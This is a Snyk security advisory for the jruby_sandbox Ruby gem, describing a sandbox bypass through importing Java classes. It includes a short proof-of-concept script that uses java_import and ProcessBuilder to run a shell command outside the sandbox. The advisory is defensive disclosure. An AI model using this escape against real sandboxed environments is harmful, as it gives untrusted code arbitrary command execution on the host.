Arbitrary Code Execution Affecting jruby_sandbox package, versions < 0.2.3

Snyk CVSS

Attack Complexity High

Confidentiality High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-RUBY-JRUBYSANDBOX-20156
published 23 Apr 2014
disclosed 23 Apr 2014
credit joernchen

Report a new vulnerability Found a mistake?

Introduced: 23 Apr 2014

CWE-94 Open this link in a new tab

Overview

jruby_sandbox is a version of _why's Freaky Freaky Sandbox for JRuby. Affected versions of this gem are vulnerable to sandbox bypassing for arbitrary code execution while importing Java classes.

Details

jruby_sandbox aims to allow safe execution of user given Ruby code within a JRuby [0] runtime. However via import of Java classes it is possible to circumvent those protections and execute arbitrary code outside the sandboxed environment.

Example:

require 'sandbox'
sand = Sandbox.safe
sand.activate!

begin
  sand.eval("print id")
rescue Exception => e
  puts "fail via Ruby ;)"
end
puts "Now for some Java"
sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
sand.eval("s = Java::java.util.Scanner.new( " +
          "Java::java.lang.ProcessBuilder.new('sh','-c','id')" +
          ".start.getInputStream  ).useDelimiter(&quot;\x00&quot;).next")
sand.eval("print s")

Arbitrary Code Execution Affecting jruby_sandbox package, versions < 0.2.3

Snyk CVSS

Introduced: 23 Apr 2014

Overview

Details

References